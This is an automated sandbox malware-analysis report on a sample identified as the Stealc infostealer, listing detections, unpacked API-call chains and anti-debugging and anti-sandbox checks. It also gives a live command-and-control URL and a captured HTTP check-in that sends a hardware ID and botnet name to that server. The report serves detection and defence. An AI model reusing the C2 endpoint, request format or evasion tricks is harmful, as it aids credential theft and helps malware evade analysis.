Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1522357
MD5: 0079fd2131677b1d9eab7228129b05c6
SHA1: b990a78e97be25d3296df08c7fd3c2c2491804cb
SHA256: e5d54dbfb6aa3a373538a399c8727551d092d8980fe263cccda5b4b910154a04
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 5740 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0079FD2131677B1D9EAB7228129B05C6)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, as well as other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches:
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |
00000001.00000003.1295074155.0000000005350000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 5740 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 5740 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
1.2.file.exe.a50000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Suricata IDS alerts:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-30T00:30:12.065256+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49700 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 1.2.file.exe.a50000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: file.exe | ReversingLabs: Detection: 39%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A5C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,1_2_00A5C820
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A59AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00A59AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A57240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_00A57240
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A59B60 CryptUnprotectData,LocalAlloc,LocalFree,1_2_00A59B60
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A68EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,1_2_00A68EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A638B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_00A638B0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A64910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00A64910
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A5DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_00A5DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A5E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_00A5E430
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A5ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_00A5ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A64570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_00A64570
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A63EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00A63EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A5F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00A5F6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00A516D0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A5DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00A5DE10
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A5BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_00A5BE70

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49700 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BAFCGIJDAFBKFIECBGCA
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 30 37 35 35 39 37 32 46 38 39 35 31 31 31 37 33 38 38 33 36 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 2d 2d 0d 0a
Data Ascii:
------BAFCGIJDAFBKFIECBGCA
Content-Disposition: form-data; name="hwid"

B0755972F8951117388365
------BAFCGIJDAFBKFIECBGCA
Content-Disposition: form-data; name="build"

doma
------BAFCGIJDAFBKFIECBGCA--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A54880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_00A54880
Source: file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3
Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpE
Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpG
Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpU
Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/u8
Source: file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37s

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00DB88AB 1_2_00DB88AB
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00D7819F 1_2_00D7819F
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E04941 1_2_00E04941
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CF1960 1_2_00CF1960
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00D92176 1_2_00D92176
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E16B3E 1_2_00E16B3E
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E1DB09 1_2_00E1DB09
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E20C63 1_2_00E20C63
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00DC3558 1_2_00DC3558
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E18575 1_2_00E18575
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E0ED2D 1_2_00E0ED2D
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E22699 1_2_00E22699
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E11FBE 1_2_00E11FBE
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00DBBF4D 1_2_00DBBF4D
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00A545C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: aabwzlbm ZLIB complexity 0.9949325273449205
Source: file.exe, 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000001.00000003.1295074155.0000000005350000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A68680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,1_2_00A68680
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A63720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,1_2_00A63720
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 39%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1864704 > 1048576
Source: file.exe | Static PE information: Raw size of aabwzlbm is bigger than: 0x100000 < 0x1a1200

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 1.2.file.exe.a50000.0.unpack :EW;.rsrc :W;.idata :W; :EW;aabwzlbm:EW;cxkmbtsd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;aabwzlbm:EW;cxkmbtsd:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A69860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00A69860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cf11f should be: 0x1d06b3
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: aabwzlbm
Source: file.exe | Static PE information: section name: cxkmbtsd
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EE50CA push 62950C49h; mov dword ptr [esp], edi 1_2_00EE50F2
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00F090C0 push ebx; mov dword ptr [esp], 2CFC6694h 1_2_00F09067
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E288D3 push 1D64D53Ah; mov dword ptr [esp], esi 1_2_00E28932
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E288D3 push 06744E82h; mov dword ptr [esp], ecx 1_2_00E2897B
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E288D3 push ecx; mov dword ptr [esp], eax 1_2_00E289EC
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EE90A6 push 1EA32B71h; mov dword ptr [esp], eax 1_2_00EE90C7
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EE90A6 push ecx; mov dword ptr [esp], 255517EBh 1_2_00EE90DE
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EAC0B9 push esi; mov dword ptr [esp], eax 1_2_00EAC0CA
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EAC0B9 push edx; mov dword ptr [esp], 4382B9D1h 1_2_00EAC0FF
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EAC0B9 push 398F2B31h; mov dword ptr [esp], ecx 1_2_00EAC175
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB08BC push 0D820FB2h; mov dword ptr [esp], ecx 1_2_00EB08F7
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB08BC push 7AA7114Eh; mov dword ptr [esp], ebx 1_2_00EB096A
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E9588B push eax; mov dword ptr [esp], ecx 1_2_00E958FE
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EE5889 push ebx; mov dword ptr [esp], edi 1_2_00EE58AC
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00DB88AB push eax; mov dword ptr [esp], 18C56015h 1_2_00DB897E
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00DB88AB push esi; mov dword ptr [esp], eax 1_2_00DB89E3
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00DB88AB push edi; mov dword ptr [esp], 9521C58Bh 1_2_00DB8A36
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00DB88AB push 4B3D91B8h; mov dword ptr [esp], ecx 1_2_00DB8A6E
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00DB88AB push 7A122765h; mov dword ptr [esp], ebx 1_2_00DB8A98
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E2F892 push edi; mov dword ptr [esp], 57075211h 1_2_00E300C0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EC6898 push 7AE67896h; mov dword ptr [esp], edi 1_2_00EC68D2
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A6B035 push ecx; ret 1_2_00A6B048
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_010F01AE push edx; mov dword ptr [esp], 7565A34Bh 1_2_010F01F1
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_010F01AE push 5D8E4FC7h; mov dword ptr [esp], edx 1_2_010F02C5
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00F1405B push 6ED1F919h; mov dword ptr [esp], ebp 1_2_00F1406A
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EFF05D push edx; mov dword ptr [esp], edi 1_2_00EFFC1F
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00ECB833 push ebp; mov dword ptr [esp], 72633DF6h 1_2_00ECB863
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00F3D81A push ebx; mov dword ptr [esp], edx 1_2_00F3D831
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E5D9FC push ecx; mov dword ptr [esp], 2FFF5BD7h 1_2_00E5DA28
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E881C9 push 6F824FABh; mov dword ptr [esp], ebp 1_2_00E88208
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E881C9 push 35C83454h; mov dword ptr [esp], ebp 1_2_00E8821E
Source: file.exe | Static PE information: section name: aabwzlbm entropy: 7.952978260214906

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A69860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00A69860

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_1-13651
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E2E385 second address: E2E399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F60F0BA102Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E221C8 second address: E221D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E2DC5E second address: E2DC7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F0BA1034h 0x00000009 popad 0x0000000a jc 00007F60F0BA1028h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E309BC second address: E30A70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F60F0C8AB58h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 jmp 00007F60F0C8AB5Eh 0x0000002d or ecx, dword ptr [ebp+122D2890h] 0x00000033 push 77BECC32h 0x00000038 push ebx 0x00000039 jmp 00007F60F0C8AB61h 0x0000003e pop ebx 0x0000003f xor dword ptr [esp], 77BECCB2h 0x00000046 mov dl, 7Bh 0x00000048 push 00000003h 0x0000004a jmp 00007F60F0C8AB63h 0x0000004f push 00000000h 0x00000051 and di, 6FB6h 0x00000056 jnl 00007F60F0C8AB59h 0x0000005c push 00000003h 0x0000005e mov edi, dword ptr [ebp+122D29C8h] 0x00000064 call 00007F60F0C8AB59h 0x00000069 push ecx 0x0000006a push edi 0x0000006b push eax 0x0000006c pop eax 0x0000006d pop edi 0x0000006e pop ecx 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 jp 00007F60F0C8AB56h 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E30A70 second address: E30A76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E30A76 second address: E30ABE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jnc 00007F60F0C8AB69h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F60F0C8AB5Eh 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E30ABE second address: E30AEE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F60F0BA102Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f jmp 00007F60F0BA1037h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E30AEE second address: E30B63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop eax 0x0000000b jl 00007F60F0C8AB56h 0x00000011 lea ebx, dword ptr [ebp+1245286Dh] 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F60F0C8AB58h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D17BCh], esi 0x00000037 mov edx, dword ptr [ebp+122D3444h] 0x0000003d push eax 0x0000003e pushad 0x0000003f jmp 00007F60F0C8AB69h 0x00000044 push eax 0x00000045 push edx 0x00000046 jnl 00007F60F0C8AB56h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E30C09 second address: E30C13 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F60F0BA1026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E30C13 second address: E30C49 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F60F0C8AB58h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 327B780Ch 0x00000013 jg 00007F60F0C8AB5Ah 0x00000019 mov dx, 9CB4h 0x0000001d lea ebx, dword ptr [ebp+12452876h] 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F60F0C8AB5Eh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E30C49 second address: E30C4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
